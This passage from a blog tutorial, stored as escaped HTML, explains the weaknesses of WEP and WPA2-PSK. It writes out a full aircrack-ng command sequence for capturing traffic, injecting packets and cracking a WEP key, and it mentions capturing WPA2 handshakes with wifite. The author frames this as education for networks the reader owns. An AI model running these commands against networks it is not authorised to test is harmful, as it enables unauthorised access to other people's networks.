\u26a0\ufe0f Note: The demos are for educational purposes only. Only test on networks you own or have explicit permission to analyze.<\/em><\/p>\n<\/blockquote>\n\n\n\n You pretty much never see this one anymore \u2014 and for good reason.<\/p>\n\n\n\n Wired Equivalent Privacy (WEP) was introduced back in 1997. It uses the RC4 stream cipher and supports either 40-bit or 104-bit key encryption. Everyone connecting to a WEP network uses the same encryption key, which already introduces a major flaw.<\/p>\n\n\n\n RC4 works by generating a key stream using the encryption key and a small initialization vector (IV). This stream is XOR-ed with the plaintext data to produce ciphertext. But WEP has terrible IV management \u2014 it reuses IVs frequently, which allows attackers to capture enough packets and crack the encryption in minutes using tools like Bottom line: WEP is broken beyond repair. You should never use it.<\/p>\n\n\n\n To make it interesting, I generated a 13-character password (suitable for 128-bit WEP):<\/p>\n\n\n\n Then I ran the following commands to attack a WEP network:<\/p>\n\n\n\n WPA2 was introduced in 2004 and is still the most widely used standard today \u2014 especially in home networks. Most routers use WPA2-PSK<\/strong> (Pre-Shared Key), where you set a Wi-Fi password and share it with all devices that want to connect.<\/p>\n\n\n\n It replaced the insecure RC4 cipher with AES-CCMP<\/strong>, which is much more secure. The real magic happens in the 4-way handshake<\/strong>, which happens when a device connects:<\/p>\n\n\n\n That said, WPA2-PSK is still vulnerable<\/strong> to brute-force attacks if the password is weak. Attackers can capture the handshake and attempt offline password cracking.<\/p>\n\n\n\n Also worth noting: with the rise of quantum computing, AES encryption could theoretically be weakened using Grover\u2019s algorithm<\/strong>, which speeds up brute-force attempts. (I’ll write more about quantum cryptography in a future post.)<\/p>\n\n\n\n For WPA2-PSK, I used wifite<\/strong> to simplify the capture process:<\/p>\n\n\n\n\ud83d\uded1 WEP \u2014 Don\u2019t Even Bother<\/h2>\n\n\n\n
aircrack-ng<\/code>.<\/p>\n\n\n\nDemo: Cracking WEP in Minutes<\/h3>\n\n\n\n
$ grep -E '^.{13}$' rockyou.txt | shuf -n 1\nana067burg231<\/code><\/pre>\n\n\n\n$ airmon-ng start wlan0\n$ airodump-ng wlan0mon --bssid <router-BSSID> -c <channel> -w wep-crack\n$ aireplay-ng -3 -b <router-BSSID> wlan0mon\n$ aircrack-ng wep-crack-01.cap<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/04\/Screenshot_2025-04-24_20_22_08-1024x337.png\")
<\/figure>\n\n\n\n\n
aireplay-ng -3<\/code> is used to inject packets and speed up the capture process (especially useful if the router isn\u2019t connected to the internet).<\/li>\n<\/ul>\n\n\n\n\n
\n
aircrack-ng<\/code> cracked the password.<\/li>\n<\/ul>\n\n\n\n![\"\"](\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/04\/Screenshot_2025-04-24_20_30_36-1-1024x488.png\")
<\/figure>\n\n\n\n\ud83d\udd10 WPA2 \u2014 The Current Standard<\/h2>\n\n\n\n
\n
Demo: Cracking WPA2 with Hashcat<\/h3>\n\n\n\n
![\"\"](\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/04\/Screenshot_2025-04-24_20_52_46-1024x912.png\")
<\/figure>\n\n\n\n
![\"\"](\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/04\/Schermafbeelding-2025-04-24-205840-1.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/04\/Schermafbeelding-2025-04-24-210512.png\")
<\/figure>\n\n\n\n